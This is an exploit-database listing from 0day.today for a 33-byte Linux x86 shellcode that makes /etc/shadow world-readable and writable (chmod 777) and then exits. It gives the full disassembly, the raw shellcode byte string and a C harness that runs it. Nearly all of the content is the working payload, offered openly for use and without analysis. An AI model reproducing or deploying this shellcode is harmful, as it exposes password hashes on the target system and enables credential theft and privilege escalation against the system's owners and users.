[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 - chmod() 777 /etc/shadow & exit() - 33 bytes

Author
b3mb4m
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23900
Category
shellcode
Date add
19-07-2015
Platform
linux/x86
Linux/x86 - chmod() 777 /etc/shadow & exit() - 33 bytes

#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Concat : b3mb4m@gmail.com

Disassembly of section .text:

08048060 <.text>:
 8048060:    31 c0                    xor    %eax,%eax
 8048062:    50                       push   %eax
 8048063:    68 61 64 6f 77           push   $0x776f6461
 8048068:    68 63 2f 73 68           push   $0x68732f63
 804806d:    68 2f 2f 65 74           push   $0x74652f2f
 8048072:    b0 0f                    mov    $0xf,%al
 8048074:    89 e3                    mov    %esp,%ebx
 8048076:    66 b9 ff 01              mov    $0x1ff,%cx
 804807a:    cd 80                    int    $0x80
 804807c:    31 c0                    xor    %eax,%eax
 804807e:    40                       inc    %eax
 804807f:    cd 80                    int    $0x80

#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\xb0\x0f\x89\xe3\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";

int main(void){
    fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();}

#  0day.today [2024-11-15]  #